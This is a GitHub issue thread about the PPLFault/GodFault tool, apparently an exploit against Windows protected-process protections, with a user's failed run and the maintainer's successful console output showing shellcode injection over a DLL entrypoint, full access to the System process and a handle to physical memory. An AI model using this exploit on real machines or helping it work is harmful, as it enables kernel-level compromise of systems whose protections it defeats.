gabriellandau / PPLFault

Not working

notsnakesilent opened this issue

[?] Server does not appear to be running. Attempting to install it...
[+] GetShellcode: 2304 bytes of shellcode written over DLL entrypoint
[+] CSRSS PID is 780
[+] Benign: C:\Windows\System32\EventAggregation.dll.bak
[+] Payload: C:\GodFaultTemp\GodFaultPayload.dll
[+] Placeholder: C:\GodFaultTemp\EventAggregationPH.dll
[+] Acquired exclusive oplock to file: C:\Windows\System32\devobj.dll
[+] Testing initial ability to acquire PROCESS_ALL_ACCESS to System: Failure
[+] Ready. Spawning WinTcb.
[+] SpawnPPL: Waiting for child process to finish.
[!] SpawnPPL: WaitForSingleObject returned 258. Expected WAIT_OBJECT_0. GLE: 5
[!] Server does not appear to be running.
[+] No cleanup necessary. Backup does not exist.

services.exe spawned does not use any CPU, maybe it's my PC

It's probably some other software on your machine touching the placeholder before services.exe can. It works on the latest Win11 23H2.

Microsoft Windows [Version 10.0.22631.2861]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\System32>cd \Users\user\Desktop

C:\Users\user\Desktop>GodFault.exe
 [?] Server does not appear to be running.  Attempting to install it...
 [+] CSRSS PID is 628
 [+] Testing initial ability to acquire PROCESS_ALL_ACCESS to System: Failure
 [+] Ready.  Spawning WinTcb.
 [+] SpawnPPL: Waiting for child process to finish.
 [+] Thread 4308 (KTHREAD FFFFDF88F28A8080) has been blessed by GodFault
 [+] Testing post-exploit ability to acquire PROCESS_ALL_ACCESS to System: Success
 [+] Opened \Device\PhysicalMemory.  Handle is 0x1b0
 [+] Opened System process as PROCESS_ALL_ACCESS.  Handle is 0x1b8
 [+] Press any key to continue...

MS tried to patch it in November, but that fell through. It will hopefully get patched soon.